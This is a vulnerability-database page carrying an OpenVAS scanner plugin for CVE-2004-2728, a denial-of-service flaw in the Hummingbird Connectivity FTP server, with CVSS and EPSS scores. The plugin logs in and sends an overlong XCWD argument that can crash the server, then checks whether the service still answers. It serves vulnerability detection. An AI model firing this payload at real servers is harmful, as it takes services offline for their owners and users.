Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2004 David MaciejakOPENVAS:136141256231015613
HistoryNov 03, 2005 - 12:00 a.m.

Hummingbird Connectivity FTP service XCWD Overflow

2005-11-0300:00:00
Copyright (C) 2004 David Maciejak
plugins.openvas.org
20

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:S/C:N/I:N/A:P

6.9 Medium

AI Score

Confidence

Low

0.016 Low

EPSS

Percentile

87.3%

JSON

The remote host is running the Hummingbird Connectivity FTP server.

It was possible to shut down the remote FTP server by issuing
a XCWD command followed by a too long argument.

# SPDX-FileCopyrightText: 2004 David Maciejak
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.15613");
  script_version("2023-12-20T05:05:58+0000");
  script_tag(name:"last_modification", value:"2023-12-20 05:05:58 +0000 (Wed, 20 Dec 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"3.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:S/C:N/I:N/A:P");
  script_cve_id("CVE-2004-2728");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/11542");
  script_xref(name:"OSVDB", value:"11133");
  script_name("Hummingbird Connectivity FTP service XCWD Overflow");
  script_category(ACT_DENIAL);
  script_tag(name:"qod_type", value:"remote_analysis");
  script_copyright("Copyright (C) 2004 David Maciejak");
  script_family("Denial of Service");
  script_dependencies("ftpserver_detect_type_nd_version.nasl", "logins.nasl");
  script_require_ports("Services/ftp", 21);

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"solution", value:"Upgrade to a newer version when available.");

  script_tag(name:"summary", value:"The remote host is running the Hummingbird Connectivity FTP server.

  It was possible to shut down the remote FTP server by issuing
  a XCWD command followed by a too long argument.");

  script_tag(name:"impact", value:"This problem allows an attacker to prevent the remote site
  from sharing some resources with the rest of the world.");

  exit(0);
}

include("ftp_func.inc");
include("misc_func.inc");
include("port_service_func.inc");

port = ftp_get_port(default:21);

soc = open_sock_tcp(port);
if(soc)
{
  kb_creds = ftp_get_kb_creds();
  login = kb_creds["login"];
  password = kb_creds["pass"];

  if(ftp_authenticate(socket:soc, user:login, pass:password))
  {
    s = string("XCWD ", crap(256), "\r\n");
    send(socket:soc, data:s);
    r = recv_line(socket:soc, length:1024);
    close(soc);

    soc = open_sock_tcp(port);
    if(!soc)
    {
      security_message(port);
      exit(0);
    }
  }
  close(soc);
}

Related

cvelist 1
openvas 1
cve 1
nessus 1
nvd 1
cvelist
cvelist
CVE-2004-2728
2007-10-09 10:00:00
openvas
openvas
Hummingbird Connectivity FTP service XCWD Overflow
2005-11-03 00:00:00
cve
cve
CVE-2004-2728
2007-10-09 10:00:00
nessus
nessus
Hummingbird Connectivity FTP Service XCWD Command Overflow
2004-12-31 00:00:00
nvd
nvd
CVE-2004-2728
2004-12-31 05:00:00

3.5 Low

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:S/C:N/I:N/A:P

6.9 Medium

AI Score

Confidence

Low

0.016 Low

EPSS

Percentile

87.3%

JSON
Related for OPENVAS:136141256231015613
cvelist1openvas1cve1nessus1nvd1